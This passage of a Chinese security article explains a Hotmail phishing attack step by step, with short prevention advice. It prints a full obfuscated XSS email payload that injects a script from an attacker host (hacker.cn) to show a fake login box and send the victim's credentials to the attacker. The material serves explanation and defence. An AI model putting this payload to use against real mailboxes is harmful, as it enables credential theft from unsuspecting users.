第二步:伪装页面做好了,接下来黑客就会制作跨站的Hotmail 电子邮件。一般黑客会选择可以直接在邮件中编辑HTML代码的软件,例如DreamMail。启动DreamMail后,新建一个支持POP3的电子信箱地址。
然后点击DreamMail菜单栏“查看”中的“切换到豪华版本”选项,又用DreamMail新建一封HTML空白邮件,在邮件的内容页面中点击右键,选择“编辑HTML源代码”,在弹出的HTML源代码编辑窗口中输入以下XSS跨站代码:
<font color="ffffff">
<div id="jmp" style="display:none">nop</div>
<div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div>
<div id="tip" title="<a style="display:none">" style="display:none"></div>
<div id="tap" title="<" style="display:none"></div>
<div id="tep" title=">" style="display:none"></div>
<style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
在这段代码中,黑客会根据自己伪装网页的地址和电子邮件更改“http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com” 链接地址。邮件编辑好之后点击“确定”即可就完成了跨站邮件是制作。
图2
跨站防范方案
要防范XSS跨站攻击,普通用户除了不要点击陌生的来信和网络链接外,最好关闭浏览器的 JavaScript 功能。此外,还可以将IE的安全级别设置为最高,这样还可以防止Cookie被盗。网站管理者在制作网页时,要注意过滤用户输入的特殊字符,这样就可以避免大部分的XSS攻击了。如果网络管理者发现有针对自己网站的跨站攻击,就要及时对被跨站的程序进行修补。
第三步:黑客会给自己的这封邮件起一个响亮诱人的名字,然后发送到受害者的MSN邮箱中,当受害者用Hotmail查看这封邮件后,会弹出Hotmail登录框诱骗你输入账号和密码登录。受害者警惕性弱,就会在该恶意页面中输入账号和密码,这些信息没有发送到微软的服务器上,而是悄悄地发送到黑客那里了(图2)。
文章来源于领测软件测试网 https://www.ltesting.net/